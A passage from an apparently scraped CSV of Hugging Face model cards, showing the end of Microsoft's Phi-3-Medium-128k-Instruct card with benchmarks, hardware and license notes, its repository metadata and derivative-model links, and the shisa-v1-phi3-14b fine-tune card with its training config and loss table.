|Benchmark|Phi-3-Medium-128k-Instruct<br>14b|Command R+<br>104B|Mixtral<br>8x22B|Llama-3-70B-Instruct|GPT3.5-Turbo<br>version 1106|Gemini<br>Pro|GPT-4-Turbo<br>version 1106 (Chat)|
|
| 227 |
+
|--------|------------------------|--------|-------------|-------------------|-------------------|----------|------------------------|
|
| 228 |
+
| Popular aggregated benchmark | 72.3 | 69.9 | 73.4 | 76.3 | 67.0 | 67.5 | 80.5 |
|
| 229 |
+
| Reasoning | 83.2 | 79.3 | 81.5 | 86.7 | 78.3 | 80.4 | 89.3 |
|
| 230 |
+
| Language understanding | 75.3 | 75.7 | 78.7 | 77.9 | 70.4 | 75.3 | 81.6 |
|
| 231 |
+
| Code generation | 64.2 | 68.6 | 60.0 | 69.3 | 70.4 | 66.7 | 76.1 |
|
| 232 |
+
| Math | 52.9 | 45.3 | 52.5 | 59.7 | 52.8 | 50.9 | 67.1 |
|
| 233 |
+
| Factual knowledge | 47.5 | 60.3 | 60.6 | 52.4 | 63.4 | 54.6 | 45.9 |
|
| 234 |
+
| Multilingual | 62.2 | 67.8 | 69.8 | 62.0 | 67.0 | 73.4 | 78.2 |
|
| 235 |
+
| Robustness | 70.2 | 57.9 | 65.5 | 78.7 | 69.3 | 69.7 | 84.6 |
|
| 236 |
+
|
| 237 |
+
|
| 238 |
+
## Software
|
| 239 |
+
|
| 240 |
+
* [PyTorch](https://github.com/pytorch/pytorch)
|
| 241 |
+
* [DeepSpeed](https://github.com/microsoft/DeepSpeed)
|
| 242 |
+
* [Transformers](https://github.com/huggingface/transformers)
|
| 243 |
+
* [Flash-Attention](https://github.com/HazyResearch/flash-attention)
|
| 244 |
+
|
| 245 |
+
## Hardware
|
| 246 |
+
Note that by default, the Phi-3-Medium model uses flash attention, which requires certain types of GPU hardware to run. We have tested on the following GPU types:
|
| 247 |
+
* NVIDIA A100
|
| 248 |
+
* NVIDIA A6000
|
| 249 |
+
* NVIDIA H100
|
| 250 |
+
|
| 251 |
+
If you want to run the model on:
|
| 252 |
+
+ Optimized inference on GPU, CPU, and Mobile: use the **ONNX** models [128k](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct-onnx-cuda)
|
| 253 |
+
|
| 254 |
+
## Cross Platform Support
|
| 255 |
+
|
| 256 |
+
ONNX runtime ecosystem now supports Phi3 Medium models across platforms and hardware.
|
| 257 |
+
Optimized phi-3 models are also published here in ONNX format, to run with ONNX Runtime on CPU and GPU across devices, including server platforms, Windows, Linux and Mac desktops, and mobile CPUs, with the precision best suited to each of these targets. DirectML GPU acceleration is supported for Windows desktops GPUs (AMD, Intel, and NVIDIA).
|
| 258 |
+
Along with DML, ONNX Runtime provides cross platform support for Phi3 Medium across a range of devices CPU, GPU, and mobile.
|
| 259 |
+
Here are some of the optimized configurations we have added:
|
| 260 |
+
|
| 261 |
+
|
| 262 |
+
1. ONNX models for int4 DML: Quantized to int4 via AWQ
|
| 263 |
+
2. ONNX model for fp16 CUDA
|
| 264 |
+
3. ONNX model for int4 CUDA: Quantized to int4 via RTN
|
| 265 |
+
4. ONNX model for int4 CPU and Mobile: Quantized to int4 via RTN
|
| 266 |
+
|
| 267 |
+
## License
|
| 268 |
+
|
| 269 |
+
The model is licensed under the [MIT license](https://huggingface.co/microsoft/Phi-3-medium-128k/resolve/main/LICENSE).
|
| 270 |
+
|
| 271 |
+
## Trademarks
|
| 272 |
+
|
| 273 |
+
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party’s policies.
|
| 274 |
+
","{""id"": ""microsoft/Phi-3-medium-128k-instruct"", ""author"": ""microsoft"", ""sha"": ""fa7d2aa4f5ea69b2e36b20d050cdae79c9bfbb3f"", ""last_modified"": ""2024-08-20 19:58:08+00:00"", ""created_at"": ""2024-05-07 15:27:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 24921, ""downloads_all_time"": null, ""likes"": 380, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""nlp"", ""code"", ""conversational"", ""custom_code"", ""multilingual"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlicense: mit\nlicense_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE\npipeline_tag: text-generation\ntags:\n- nlp\n- code\ninference:\n parameters:\n temperature: 0.7\nwidget:\n- messages:\n - role: user\n content: Can you provide ways to eat combinations of bananas and dragonfruits?"", ""widget_data"": [{""messages"": [{""role"": ""user"", ""content"": ""Can you provide ways to eat combinations of bananas and dragonfruits?""}]}], ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CODE_OF_CONDUCT.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='NOTICE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='SECURITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='sample_finetune.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""allenai/WildBench"", ""eduagarcia/open_pt_llm_leaderboard"", ""allenai/ZebraLogic"", ""flowers-team/StickToYourRoleLeaderboard"", ""genai-impact/ecologits-calculator"", ""Crisp-Unimib/INVALSIbenchmark"", ""codelion/optillm"", ""Justinrune/LLaMA-Factory"", ""kenken999/fastapi_django_main_live"", ""WildEval/ZebraLogic"", ""markmagic/Phi-3-medium-128k-instruct"", ""nikunjcepatel/OpenrouterAPITest"", ""jbjbjb55/First_agent_template"", ""ReallyFloppyPenguin/SynthGen"", ""abhijitkumarjha88192/testllmgr"", ""yingzhanghhh/microsoft-Phi-3-medium-128k-instruct"", ""babah1998/Phi-3-medium-4k-instruct"", ""way2mhemanth/microsoft-Phi-3-medium-128k-instruct"", ""vuxuanhoan/anychat"", ""Mackintoshj/anychat"", ""mariamgvelesiani/anychat"", ""yalotaibii/anychat"", ""ilovemystagename/anychat"", ""RoyZheng/microsoft-Phi-3-medium-128k-instruct"", ""Mister12rayyan/RYanychat"", ""msun415/Llamole"", ""kalashshah19/SwitchAI""], ""safetensors"": {""parameters"": {""BF16"": 13960238080}, ""total"": 13960238080}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-20 19:58:08+00:00"", ""cardData"": ""language:\n- multilingual\nlicense: mit\nlicense_link: https://huggingface.co/microsoft/Phi-3-medium-128k-instruct/resolve/main/LICENSE\npipeline_tag: text-generation\ntags:\n- nlp\n- code\ninference:\n parameters:\n temperature: 0.7\nwidget:\n- messages:\n - role: user\n content: Can you provide ways to eat combinations of bananas and dragonfruits?"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""663a4864bdcfe1472b15580d"", ""modelId"": ""microsoft/Phi-3-medium-128k-instruct"", ""usedStorage"": 27921004451}",0,"https://huggingface.co/migtissera/Tess-v2.5-Phi-3-medium-128k-14B, https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1, https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1, https://huggingface.co/shisa-ai/shisa-v1-phi3-14b, https://huggingface.co/flammenai/Mahou-1.2-phi-14B, https://huggingface.co/DarqueDante/Phi3Mix, https://huggingface.co/dankalin/phi3-medium-instruct",7,"https://huggingface.co/kostasman1/results, https://huggingface.co/jak6/results_medium, https://huggingface.co/alsokit/Phi-3-medium-128K-LoRA, https://huggingface.co/KEITA21/Phi-3-medium-128k-instruct, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C1, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C2, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C3, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C4, https://huggingface.co/kamel-usp/aes_enem_models-sourceA-classification-from-phi3-medium-128k-lora-C5, https://huggingface.co/swkong/Adapter-Phi-3-medium-128k-instruct-bnb-lora, https://huggingface.co/swkong/Adapter-Phi-3-medium-128k-instruct-lora-hrdx-gptq, https://huggingface.co/lfhe/task-7-deepseek-ai-DeepSeek-R1-Distill-Qwen-7B, https://huggingface.co/gvo1112/task-7-meta-llama-Meta-Llama-3.1-8B-Instruct, https://huggingface.co/jerseyjerry/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/flockgo/task-7-microsoft-Phi-3-mini-128k-instruct, https://huggingface.co/DreamGallery/task-7-microsoft-Phi-3-mini-128k-instruct, https://huggingface.co/robertou2/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/jenniellama/task-7-microsoft-Phi-3-medium-128k-instruct, https://huggingface.co/gvo1112/task-7-microsoft-Phi-3-medium-128k-instruct-1745363668, https://huggingface.co/linsanityuk/task-7-dailysub_202504230109, https://huggingface.co/linsanityuk/task-7-dailysub_202504230123, https://huggingface.co/linsanityuk/task-7-dailysub_202504230129, https://huggingface.co/linsanityuk/task-7-dailysub_202504230135",23,"https://huggingface.co/mradermacher/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/qwp4w3hyb/Phi-3-medium-128k-instruct-iMat-GGUF, https://huggingface.co/nisten/phi3-medium-128k-gguf, https://huggingface.co/bartowski/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1-Q4_K_M-GGUF, https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1-Q6_K-GGUF, https://huggingface.co/second-state/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/gaianet/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/qwp4w3hyb/Phi-3-medium-4k-instruct-iMat-GGUF, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-2_2bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-2_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-3_75bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-4_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-4_25bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-5_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-6_0bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-6_5bpw_exl2, https://huggingface.co/Zoyd/shisa-ai_shisa-v1-phi3-14b-8_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-2_2bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-2_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-3_75bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-4_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-4_25bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-5_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-6_5bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-6_0bpw_exl2, https://huggingface.co/Zoyd/flammenai_Mahou-1.2-phi-14B-8_0bpw_exl2, https://huggingface.co/legraphista/Phi-3-medium-128k-instruct-IMat-GGUF, https://huggingface.co/AdvaitTahilyani/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/newsletter/Phi-3-medium-128k-instruct-Q6_K-GGUF, https://huggingface.co/bartowski/Tess-v2.5-Phi-3-medium-128k-14B-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q6_K-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_K_M-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_K_S-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q5_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_K_S-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q4_0-GGUF, https://huggingface.co/CHE-72/Phi-3-medium-128k-instruct-Q3_K_L-GGUF, https://huggingface.co/martintomov/Phi-3-medium-128k-instruct-Q4_K_S-GGUF, https://huggingface.co/Sc0m3r/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw5.5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw3-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw3.5-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4.4-exl2, https://huggingface.co/blockblockblock/Tess-v2.5-Phi-3-medium-128k-14B-bpw4.8-exl2, https://huggingface.co/teemperor/Phi-3-medium-128k-instruct-Q6_K-GGUF, https://huggingface.co/RedHatAI/Phi-3-medium-128k-instruct-quantized.w8a16, https://huggingface.co/Kondara/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/andysalerno/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/Lambent/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/awels/maximusLLM-14b-128k-gguf, https://huggingface.co/awels/merlinLLM-14b-128k-gguf, https://huggingface.co/Dexman04/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/tayhym/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/matrixportal/Phi-3-medium-128k-instruct-Q4_K_M-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q5_0-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q4_0-GGUF, https://huggingface.co/mradermacher/Phi-3-medium-128k-instruct-i1-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q2_K-GGUF, https://huggingface.co/antoste/Phi-3-medium-128k-instruct-Q3_K_S-GGUF, https://huggingface.co/tensorblock/Phi-3-medium-128k-instruct-GGUF, https://huggingface.co/newsletter/Phi-3-medium-128k-instruct-Q8_0-GGUF, https://huggingface.co/itlwas/Phi-3-medium-128k-instruct-Q4_K_M-GGUF",71,,0,"Crisp-Unimib/INVALSIbenchmark, Justinrune/LLaMA-Factory, ReallyFloppyPenguin/SynthGen, WildEval/ZebraLogic, allenai/WildBench, allenai/ZebraLogic, codelion/optillm, eduagarcia/open_pt_llm_leaderboard, flowers-team/StickToYourRoleLeaderboard, genai-impact/ecologits-calculator, jbjbjb55/First_agent_template, kenken999/fastapi_django_main_live",12
|
| 275 |
+
https://huggingface.co/migtissera/Tess-v2.5-Phi-3-medium-128k-14B,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 276 |
+
https://huggingface.co/wwe180/Phi-3-medium-128k-27B-lingyang-v0.1,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 277 |
+
https://huggingface.co/wwe180/Phi-3-medium-128k-10B-lingyang-v0.1,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 278 |
+
shisa-ai/shisa-v1-phi3-14b,"---
|
| 279 |
+
license: mit
|
| 280 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 281 |
+
tags:
|
| 282 |
+
- generated_from_trainer
|
| 283 |
+
model-index:
|
| 284 |
+
- name: outputs/phi3-medium-128k-14b.8e6
|
| 285 |
+
results: []
|
| 286 |
+
---
|
| 287 |
+
This test ablation probably shouldn't be used. It actually underperforms the original Phi 3 Medium Instruct model as it was trained w/ ChatML (but still performs better with the original Phi 3 instruct template). If you were to do a training run w/ this dataset, I'd recommend modifying the training to use the Phi 3 Instruct chat format.
|
| 288 |
+
|
| 289 |
+
## Performance
|
| 290 |
+
Measured using a [fork](https://github.com/shisa-ai/shaberi) of [Lightblue's Shaberi benchmark framework](https://github.com/lightblue-tech/japanese_llm_eval):
|
| 291 |
+
|
| 292 |
+
| Model | Average | ELYZA-tasks-100 | MT-Bench | Rakuda | Tengu-Bench |
|
| 293 |
+
|----------------------------------------|---------|-----------------|----------|--------|-------------|
|
| 294 |
+
| gpt-4-turbo-2024-04-09 | 8.75 | 8.78 | 8.74 | 9.18 | 8.31 |
|
| 295 |
+
| gpt-4o-2024-05-13 | 8.72 | 8.88 | 8.69 | 9.15 | 8.16 |
|
| 296 |
+
| gemini-1.5-pro | 8.58 | 8.58 | 8.93 | 9.20 | 7.61 |
|
| 297 |
+
| claude-3-opus-20240229 | 8.55 | 8.64 | 8.58 | 8.75 | 8.23 |
|
| 298 |
+
| CohereForAI/c4ai-command-r-plus | 7.69 | 7.50 | 7.43 | 9.05 | 6.79 |
|
| 299 |
+
| **shisa-ai/shisa-v1-llama3-70b** | **7.30**| **7.34** | **7.67** | **8.15** | **6.04** |
|
| 300 |
+
| gpt-3.5-turbo-0125 | 7.17 | 7.24 | 6.98 | 7.64 | 6.82 |
|
| 301 |
+
| **shisa-ai/shisa-v1-llama3-70b.2e5** | **7.17**| **7.16** | **7.45** | **7.98** | **6.09** |
|
| 302 |
+
| karakuri-ai/karakuri-lm-8x7b-chat-v0.1 | 7.00 | 7.18 | 6.30 | 7.98 | 6.55 |
|
| 303 |
+
| karakuri-ai/karakuri-lm-70b-chat-v0.1 | 6.84 | 6.86 | 6.43 | 7.85 | 6.23 |
|
| 304 |
+
| lightblue/ao-karasu-72B | 6.81 | 7.19 | 6.54 | 7.25 | 6.27 |
|
| 305 |
+
| **shisa-ai/shisa-v1-llama3-8b** | **6.59**| **6.67** | **6.95** | **7.05**| **5.68** |
|
| 306 |
+
| microsoft/Phi-3-medium-128k-instruct | 6.48 | 7.10 | 5.92 | 6.84 | 6.04 |
|
| 307 |
+
| **shisa-ai/shisa-swallowmx-13a47b-v1** | **6.17**| **6.48** | **6.07** | **7.11**| **5.03** |
|
| 308 |
+
| lightblue/suzume-llama-3-8B-japanese | 5.96 | 6.68 | 4.96 | 6.68 | 5.53 |
|
| 309 |
+
| augmxnt/shisa-gamma-7b-v1 | 5.82 | 5.96 | 5.02 | 6.85 | 5.47 |
|
| 310 |
+
| **shisa-ai/shisa-v1-phi3-14b** | **5.77**| **6.28** | **5.26** | **6.55**| **5.01** |
|
| 311 |
+
| **shisa-ai/shisa-v1-gemma-8b** | **5.64**| **6.50** | **5.42** | **5.10**| **5.55** |
|
| 312 |
+
| Rakuten/RakutenAI-7B-chat | 5.58 | 5.92 | 4.60 | 6.58 | 5.24 |
|
| 313 |
+
| lightblue/qarasu-14B-chat-plus-unleashed | 5.20 | 5.58 | 4.74 | 5.46 | 5.01 |
|
| 314 |
+
| **shisa-ai/shisa-v1-mistral0.3-7b** | **5.11**| **5.64** | **6.10** | **3.83**|**4.86** |
|
| 315 |
+
| cyberagent/calm2-7b-chat | 4.76 | 4.90 | 3.58 | 5.75 | 4.81 |
|
| 316 |
+
| mistralai/Mistral-7B-Instruct-v0.2 | 4.69 | 5.78 | 4.65 | 3.80 | 4.53 |
|
| 317 |
+
| **shisa-ai/shisa-v1-yi1.5-9b** | **4.63**| **5.98** | **4.28** | **3.26**|**5.00** |
|
| 318 |
+
| augmxnt/shisa-7b-v1 | 4.50 | 4.63 | 3.95 | 4.89 | 4.53 |
|
| 319 |
+
|
| 320 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 321 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 322 |
+
|
| 323 |
+
[<img src=""https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png"" alt=""Built with Axolotl"" width=""200"" height=""32""/>](https://github.com/OpenAccess-AI-Collective/axolotl)
|
| 324 |
+
<details><summary>See axolotl config</summary>
|
| 325 |
+
|
| 326 |
+
axolotl version: `0.4.0`
|
| 327 |
+
```yaml
|
| 328 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 329 |
+
model_type: AutoModelForCausalLM
|
| 330 |
+
tokenizer_type: AutoTokenizer
|
| 331 |
+
trust_remote_code: true
|
| 332 |
+
|
| 333 |
+
load_in_8bit: false
|
| 334 |
+
load_in_4bit: false
|
| 335 |
+
strict: false
|
| 336 |
+
|
| 337 |
+
use_wandb: true
|
| 338 |
+
wandb_project: shisa-v2
|
| 339 |
+
wandb_entity: augmxnt
|
| 340 |
+
wandb_name: shisa-llama3-70b-v1.8e6
|
| 341 |
+
|
| 342 |
+
chat_template: chatml
|
| 343 |
+
datasets:
|
| 344 |
+
- path: augmxnt/ultra-orca-boros-en-ja-v1
|
| 345 |
+
type: sharegpt
|
| 346 |
+
dataset_prepared_path: last_run_prepared
|
| 347 |
+
val_set_size: 0.05
|
| 348 |
+
output_dir: ./outputs/phi3-medium-128k-14b.8e6
|
| 349 |
+
|
| 350 |
+
sequence_len: 4096
|
| 351 |
+
sample_packing: true
|
| 352 |
+
pad_to_sequence_len: true
|
| 353 |
+
neftune_noise_alpha: 5
|
| 354 |
+
|
| 355 |
+
gradient_accumulation_steps: 4
|
| 356 |
+
micro_batch_size: 2
|
| 357 |
+
num_epochs: 3
|
| 358 |
+
optimizer: paged_adamw_8bit
|
| 359 |
+
adam_beta2: 0.95
|
| 360 |
+
adam_epsilon: 0.00001
|
| 361 |
+
max_grad_norm: 1.0
|
| 362 |
+
lr_scheduler: linear
|
| 363 |
+
learning_rate: 0.000008
|
| 364 |
+
|
| 365 |
+
train_on_inputs: false
|
| 366 |
+
group_by_length: false
|
| 367 |
+
bf16: auto
|
| 368 |
+
fp16:
|
| 369 |
+
tf32: true
|
| 370 |
+
|
| 371 |
+
gradient_checkpointing: true
|
| 372 |
+
gradient_checkpointing_kwargs:
|
| 373 |
+
use_reentrant: True
|
| 374 |
+
early_stopping_patience:
|
| 375 |
+
resume_from_checkpoint:
|
| 376 |
+
local_rank:
|
| 377 |
+
logging_steps: 1
|
| 378 |
+
xformers_attention:
|
| 379 |
+
flash_attention: true
|
| 380 |
+
|
| 381 |
+
warmup_steps: 100
|
| 382 |
+
evals_per_epoch: 4
|
| 383 |
+
saves_per_epoch: 1
|
| 384 |
+
debug:
|
| 385 |
+
deepspeed: axolotl/deepspeed_configs/zero3_bf16.json
|
| 386 |
+
weight_decay: 0.1
|
| 387 |
+
fsdp:
|
| 388 |
+
fsdp_config:
|
| 389 |
+
resize_token_embeddings_to_32x: true
|
| 390 |
+
special_tokens:
|
| 391 |
+
pad_token: ""<|endoftext|>""
|
| 392 |
+
|
| 393 |
+
```
|
| 394 |
+
|
| 395 |
+
</details><br>
|
| 396 |
+
|
| 397 |
+
# outputs/phi3-medium-128k-14b.8e6
|
| 398 |
+
|
| 399 |
+
This model is a fine-tuned version of [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct) on the None dataset.
|
| 400 |
+
It achieves the following results on the evaluation set:
|
| 401 |
+
- Loss: 0.3339
|
| 402 |
+
|
| 403 |
+
## Model description
|
| 404 |
+
|
| 405 |
+
More information needed
|
| 406 |
+
|
| 407 |
+
## Intended uses & limitations
|
| 408 |
+
|
| 409 |
+
More information needed
|
| 410 |
+
|
| 411 |
+
## Training and evaluation data
|
| 412 |
+
|
| 413 |
+
More information needed
|
| 414 |
+
|
| 415 |
+
## Training procedure
|
| 416 |
+
|
| 417 |
+
### Training hyperparameters
|
| 418 |
+
|
| 419 |
+
The following hyperparameters were used during training:
|
| 420 |
+
- learning_rate: 8e-06
|
| 421 |
+
- train_batch_size: 2
|
| 422 |
+
- eval_batch_size: 2
|
| 423 |
+
- seed: 42
|
| 424 |
+
- distributed_type: multi-GPU
|
| 425 |
+
- num_devices: 8
|
| 426 |
+
- gradient_accumulation_steps: 4
|
| 427 |
+
- total_train_batch_size: 64
|
| 428 |
+
- total_eval_batch_size: 16
|
| 429 |
+
- optimizer: Adam with betas=(0.9,0.95) and epsilon=1e-05
|
| 430 |
+
- lr_scheduler_type: linear
|
| 431 |
+
- lr_scheduler_warmup_steps: 100
|
| 432 |
+
- num_epochs: 3
|
| 433 |
+
|
| 434 |
+
### Training results
|
| 435 |
+
|
| 436 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 437 |
+
|:-------------:|:------:|:----:|:---------------:|
|
| 438 |
+
| 2.8309 | 0.0021 | 1 | 2.3406 |
|
| 439 |
+
| 0.7688 | 0.2513 | 121 | 0.4958 |
|
| 440 |
+
| 0.6435 | 0.5026 | 242 | 0.3830 |
|
| 441 |
+
| 0.5286 | 0.7539 | 363 | 0.3626 |
|
| 442 |
+
| 0.5559 | 1.0052 | 484 | 0.3549 |
|
| 443 |
+
| 0.4651 | 1.2425 | 605 | 0.3486 |
|
| 444 |
+
| 0.5294 | 1.4938 | 726 | 0.3432 |
|
| 445 |
+
| 0.5453 | 1.7451 | 847 | 0.3392 |
|
| 446 |
+
| 0.5258 | 1.9964 | 968 | 0.3376 |
|
| 447 |
+
| 0.4805 | 2.2331 | 1089 | 0.3357 |
|
| 448 |
+
| 0.4552 | 2.4844 | 1210 | 0.3352 |
|
| 449 |
+
| 0.5358 | 2.7357 | 1331 | 0.3339 |
|
| 450 |
+
|
| 451 |
+
|
| 452 |
+
### Framework versions
|
| 453 |
+
|
| 454 |
+
- Transformers 4.40.2
|
| 455 |
+
- Pytorch 2.3.0+cu121
|
| 456 |
+
- Datasets 2.19.1
|
| 457 |
+
- Tokenizers 0.19.1
|
| 458 |
+
